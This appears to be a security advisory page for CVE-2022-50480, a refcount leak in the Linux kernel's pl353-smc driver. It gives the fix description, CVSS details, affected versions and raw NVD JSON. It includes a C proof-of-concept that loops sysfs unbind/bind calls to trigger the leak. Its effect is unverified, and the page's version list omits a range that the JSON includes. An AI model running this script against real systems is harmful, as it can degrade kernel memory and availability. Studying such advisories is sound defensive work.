Security Vulnerability Report
CVE-2022-50480 CVSS 5.5 MEDIUM

CVE-2022-50480

Published: 2025-10-04 16:15:45
Last Modified: 2026-01-23 20:11:22
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

memory: pl353-smc: Fix refcount leak bug in pl353_smc_probe()

The break of for_each_available_child_of_node() needs a corresponding of_node_put() when the reference 'child' is not used anymore. Here we do not need to call of_node_put() in fail path as '!match' means no break.

While the of_platform_device_create() will create a new reference by 'child' but it has considered the refcounting.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.10.150
Linux Kernel 5.11-5.15.x < 5.15.75
Linux Kernel 5.16-5.19.x < 5.19.17
Linux Kernel 6.0.x < 6.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2022-50480 PoC - Trigger refcount leak in pl353_smc_probe()
 *
 * This PoC demonstrates how to trigger the reference count leak
 * by repeatedly binding/unbinding the pl353-smc platform device.
 *
 * Note: Requires root privileges to access sysfs entries.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>

#define PL353_SMC_DRIVER_PATH "/sys/bus/platform/drivers/pl353-smc"
#define PL353_SMC_DEVICE_PATH "/sys/bus/platform/drivers/pl353-smc/e0000000.memory-controller"

/* Function to bind/unbind the pl353-smc driver to trigger probe() */
static int trigger_probe(void)
{
    char buf[256];
    int fd;

    /* Unbind the device from the driver */
    fd = open(PL353_SMC_DEVICE_PATH "/driver/unbind", O_WRONLY);
    if (fd >= 0) {
        snprintf(buf, sizeof(buf), "e0000000.memory-controller\n");
        write(fd, buf, strlen(buf));
        close(fd);
    }

    /* Re-bind to trigger probe() again */
    fd = open(PL353_SMC_DRIVER_PATH "/bind", O_WRONLY);
    if (fd >= 0) {
        snprintf(buf, sizeof(buf), "e0000000.memory-controller\n");
        write(fd, buf, strlen(buf));
        close(fd);
    }

    return 0;
}

int main(int argc, char *argv[])
{
    int iterations = 1000;
    int i;

    if (argc > 1) {
        iterations = atoi(argv[1]);
    }

    printf("CVE-2022-50480 PoC: Triggering refcount leak in pl353_smc_probe()\n");
    printf("Iterations: %d\n", iterations);

    for (i = 0; i < iterations; i++) {
        trigger_probe();
        usleep(1000); /* 1ms delay */
    }

    printf("Done. Reference count should have leaked %d times.\n", iterations);
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50480", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:44.683", "lastModified": "2026-01-23T20:11:22.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmemory: pl353-smc: Fix refcount leak bug in pl353_smc_probe()\n\nThe break of for_each_available_child_of_node() needs a\ncorresponding of_node_put() when the reference 'child' is not\nused anymore. Here we do not need to call of_node_put() in\nfail path as '!match' means no break.\n\nWhile the of_platform_device_create() will created a new\nreference by 'child' but it has considered the refcounting."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0", "versionEndExcluding": "5.4.220", "matchCriteriaId": "081549BE-7480-48DC-ADD8-8C4546C7330C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.150", "matchCriteriaId": "C495821C-2A71-4F09-BED8-6A6EB4C9BA27"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", 
"matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/44db35ceb94756ba513dcf6b69bf9e949b28469c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/49605dc25e7fb33bf8b671279d4468531da90f89", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/566b143aa5112a0c2784e20603778518bb799537", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/61b3c876c1cbdb1efd1f52a1f348580e6e14efb6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b37f4a711e5d4bf3608ccbc6de82b52e92b441a0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fde46754d5483bc398018bbec3c8ef5c55219e67", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}